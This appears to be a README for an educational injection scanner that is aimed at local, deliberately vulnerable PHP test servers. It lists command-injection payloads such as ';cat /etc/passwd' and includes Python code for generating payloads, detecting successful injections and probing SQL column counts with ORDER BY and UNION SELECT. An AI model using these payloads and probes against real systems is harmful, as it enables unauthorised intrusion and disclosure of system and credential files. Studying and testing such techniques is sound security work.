Scanner-and-Command-Injection

Vulnerabilities scanner tool

Primary language: Python. License: Apache-2.0

Scanner and Command Injection

Introduction

This vulnerability scanner and command-injection tool shows, through a set of examples, how vulnerable request parameters can be exploited to execute commands on the target server.

Note

The scanner will not work in every environment: the command and argument injections are based on Linux commands, so the target must run on Linux.

Requirements

Languages

  • Python (for application code)
  • PHP (for vulnerable server code)

Libraries

  • requests
  • click
  • selenium (version 4)
  • webdriver-manager

Browser

  • Chrome

Code explanation

The application code reads the input files (created by the user) and sends HTTP requests using the specified method. The commands in the payloads file are injected into each parameter using permutations, and a separate request is sent for each permutation of payloads.
Each server response is then analysed to check for a vulnerability. The check is based on a simple idea: looking for specific strings in the response body (for example, the known user from the config file after a whoami payload).
If a vulnerability is found, a descriptive line is written to the output file.

Input files

  • Requests details file: specifies the list of requests under test, each with its HTTP method, resource and parameters.
    Each line has the format: HTTP method:resource:parameter1,parameter2,..
  • Payloads file: specifies the list of commands used for a specific request; row N of the payloads file is used for row N of the requests details file.
    Each line has the format: command1~command2~..

Requests details file format example

GET:/ping.php:host
GET:/ping-escapeshellcmd.php:host
GET:/find-escapeshellcmd.php:input
GET:/ping-no-amp.php:host
POST:/login2.php:user,pass
GET:/search_by_price2.php:max
GET:/echo-name.php:name

Payloads file format example

;cat /etc/passwd
;ls -la
ping.php -exec whoami ;
;head ping.php
--noc
--noc
--xss
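Putting the two formats together, here is an added Python example (not the project's own code) that parses both files, pairs row N of the payloads with row N of the requests, expands the commands over the parameters, and applies the string-in-body check described above. Assumptions: every command is tried in every parameter (itertools.product; the project's permutation scheme may differ), the marker strings for each command are my own choices, and the input text and response bodies are constructed samples rather than real files or server output. The baseline comparison, which ignores markers already present in the response without a payload, is an added precaution against false positives.

```python
import itertools
import re
from dataclasses import dataclass

# Config values as in the README's config file example.
REQUESTS_SPLIT_VAL = ':'
REQUESTS_PARAMETERS_SPLIT_VAL = ','
PAYLOADS_SPLIT_VAL = '~'
CURRENT_USER = 'andre'

# Constructed sample input in the two file formats (not read from disk).
REQUESTS_DETAILS = """GET:/ping.php:host
POST:/login2.php:user,pass
"""
PAYLOADS = """;cat /etc/passwd~;whoami
;id~;ls -la
"""

# Constructed response bodies: a clean ping page, and the same page after a
# successful ';cat /etc/passwd' injection appended the file to the output.
BASELINE_BODY = "PING 127.0.0.1: 64 bytes from 127.0.0.1: icmp_seq=1 ttl=64\n"
VULNERABLE_BODY = BASELINE_BODY + "root:x:0:0:root:/root:/bin/bash\n"

# Strings expected in the response body when a given command actually ran
# (assumed markers). The whoami marker is the known user from the config file.
SIGNATURES = [
    (re.compile(r"cat /etc/passwd"), "root:x:0:0"),
    (re.compile(r"\bwhoami\b"), CURRENT_USER),
    (re.compile(r"\bid\b"), "uid="),
    (re.compile(r"\bls -la\b"), "total "),
]


@dataclass
class RequestDetails:
    method: str
    resource: str
    parameters: tuple


@dataclass
class Attempt:
    method: str
    resource: str
    params: dict  # parameter name -> injected payload


def parse_requests_details(text):
    """Parse 'METHOD:resource:p1,p2' lines; reject malformed lines instead of guessing."""
    details = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        parts = line.split(REQUESTS_SPLIT_VAL, 2)
        if len(parts) != 3:
            raise ValueError(f"line {lineno}: expected method:resource:params, got {line!r}")
        method, resource, params = parts
        method = method.upper()
        if method not in ("GET", "POST"):
            raise ValueError(f"line {lineno}: unsupported HTTP method {method!r}")
        parameters = tuple(p.strip() for p in params.split(REQUESTS_PARAMETERS_SPLIT_VAL) if p.strip())
        if not parameters:
            raise ValueError(f"line {lineno}: no parameters given")
        details.append(RequestDetails(method, resource, parameters))
    return details


def parse_payloads(text):
    """Parse 'cmd1~cmd2' lines; payloads keep their internal spaces untouched."""
    return [line.split(PAYLOADS_SPLIT_VAL) for line in text.splitlines() if line.strip()]


def build_attempts(details, payload_rows):
    """Pair row N of the payloads with row N of the requests and expand the commands
    over the parameters. Assumption: every command is tried in every parameter, so a
    row with fewer commands than parameters still yields attempts."""
    if len(details) != len(payload_rows):
        raise ValueError(f"{len(details)} request rows but {len(payload_rows)} payload rows")
    attempts = []
    for req, commands in zip(details, payload_rows):
        for combo in itertools.product(commands, repeat=len(req.parameters)):
            attempts.append(Attempt(req.method, req.resource, dict(zip(req.parameters, combo))))
    return attempts


def check_response(attempt, body, baseline_body=""):
    """Return one descriptive line per parameter whose injected command left its marker
    in the response body. A marker already present in the baseline response (the page
    fetched without payloads) is ignored to avoid false positives."""
    findings = []
    for param, payload in attempt.params.items():
        for pattern, marker in SIGNATURES:
            if pattern.search(payload) and marker in body and marker not in baseline_body:
                findings.append(
                    f"{attempt.method} {attempt.resource} parameter={param} "
                    f"payload={payload!r}: found {marker!r} in response body"
                )
    return findings


if __name__ == "__main__":
    attempts = build_attempts(parse_requests_details(REQUESTS_DETAILS), parse_payloads(PAYLOADS))
    for attempt in attempts:
        for line in check_response(attempt, VULNERABLE_BODY, BASELINE_BODY):
            print(line)
```

In a real run the body passed to check_response comes from the requests library response for each attempt, and the returned lines are what gets appended to the vulnerability output file.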

Config file example

DEBUG = True # if True, code execution prints debugging lines
KEEP_BROWSER_OPEN = False # used to keep the browser open after selenium checks

TARGET = 'http://localhost:8000' # target

VULNERABILITY_OUTPUT_PATH = 'assets/output/vulnerability-output.txt' # output path

REQUESTS_SPLIT_VAL = ':' # split char for requests
REQUESTS_PARAMETERS_SPLIT_VAL = ',' # split char for parameters in requests
PAYLOADS_SPLIT_VAL = '~' # split char for commands values

CURRENT_USER = 'andre' # known user used for whoami test

COMMAND_COLUMNS_NUMBER = '--noc' # command to find the number of columns in a table. Valid only in sql mode
COMMAND_XSS_INJECTION = '--xss' # command to test xss injections. Valid only in xss mode

MAX_ALERT_WAITING_TIME = 5 # max time (in seconds) to wait for the popup message in browser

Database setup

The data stored in the database will be used to test sql injections.
Execute the files in sqli-target/setup to create and populate the database.
Connection credentials are stored in sqli-target/mysql_credentials.php file.

Server execution

For commands and arguments injections

foo@bar:~$ cd "target environment"
foo@bar:~$ php -S localhost:8000

For sql injections

foo@bar:~$ cd sqli-target
foo@bar:~$ php -S localhost:8000

For xss injections

foo@bar:~$ cd xss-target
foo@bar:~$ php -S localhost:8000

Application execution

Arguments

  • -m, Injection mode, required. Permitted values: [cmd, sql, xss]
    • cmd: tests command and argument injections.
    • sql: tests SQL injections. In this mode the payloads are used differently than in cmd mode: the mode is based on a specific command (set in the config file) that performs a Union-based SQL injection to find the number of columns. Other injections can be tested, but no check is performed for them.
    • xss: tests XSS injections for the GET HTTP method. The mode injects the payloads, checks whether they appear in the HTTP response, and then uses selenium to verify that they are shown as a dialog popup.
  • -r, Requests details file, required
  • -p, Payloads file, required
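The column-count probe behind the sql mode's Union-based check, as an added Python illustration of the approach (not the project's code): walk ORDER BY n upward until MySQL reports an unknown column, then confirm the count with a UNION SELECT of that many NULLs. The ORDER BY pre-probe is my addition; the page only states that the mode performs a Union-based injection. The target is a constructed fake page that simulates a query with a fixed number of columns and MySQL error reporting switched on, plus a second fake page using prepared statements, so the example runs offline.

```python
import re

# MySQL error texts that reveal a wrong column count (excerpts of the server's
# own messages, used here as detection strings).
ORDER_BY_ERROR = "Unknown column '{n}' in 'order clause'"
UNION_ERROR = "The used SELECT statements have a different number of columns"


def order_by_payload(n):
    """'ORDER BY n' probe: errors once n exceeds the column count of the query."""
    return f"1' ORDER BY {n}-- -"


def union_payload(n):
    """'UNION SELECT NULL,...' probe with n NULLs; succeeds only with the right count."""
    return "1' UNION SELECT " + ",".join(["NULL"] * n) + "-- -"


def find_column_count(send, max_columns=25):
    """Find the number of columns of the injectable query.

    `send(value)` issues one request with `value` in the parameter under test and
    returns the response body. Walk ORDER BY 1..max_columns+1 until the first error,
    then confirm the count with a UNION SELECT of that many NULLs. Returns None when
    no error ever appears (parameter not injectable, or errors hidden) or when the
    UNION confirmation fails."""
    count = None
    for n in range(1, max_columns + 2):
        body = send(order_by_payload(n))
        if "Unknown column" in body and "order clause" in body:
            count = n - 1
            break
    if not count:
        return None
    if UNION_ERROR in send(union_payload(count)):
        return None
    return count


def make_fake_target(real_columns):
    """Constructed stand-in for a vulnerable PHP page: simulates a query such as
    SELECT id,name,price FROM products WHERE price < '<max>' that selects
    `real_columns` columns and echoes MySQL errors into the page."""
    def send(value):
        m = re.search(r"ORDER BY (\d+)", value)
        if m and int(m.group(1)) > real_columns:
            return "Error: " + ORDER_BY_ERROR.format(n=int(m.group(1)))
        m = re.search(r"UNION SELECT ((?:NULL,?)+)", value)
        if m and m.group(1).count("NULL") != real_columns:
            return "Error: " + UNION_ERROR
        return "<table><tr><td>1</td><td>widget</td><td>9.99</td></tr></table>"
    return send


def make_safe_target():
    """Constructed stand-in for a page using prepared statements: the input is treated
    as data, so no probe ever produces a SQL error."""
    return lambda value: "<table></table>"


if __name__ == "__main__":
    print(find_column_count(make_fake_target(3)))  # prints 3
    print(find_column_count(make_safe_target()))   # prints None
```

Once the count is known, the NULL placeholders can be replaced one at a time with data such as a string literal to find which columns are rendered in the page; that step is not shown here.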

Example for cmd mode

foo@bar:~$ python main.py -m cmd -r assets/input/requests-details-cmd.txt -p assets/input/payloads-cmd.txt

Example for sql mode

foo@bar:~$ python main.py -m sql -r assets/input/requests-details-sql.txt -p assets/input/payloads-sql.txt

Example for xss mode

foo@bar:~$ python main.py -m xss -r assets/input/requests-details-xss.txt -p assets/input/payloads-xss.txt

Output

The output file is saved to assets/output/vulnerability-output.txt (the VULNERABILITY_OUTPUT_PATH setting in the config file).

Author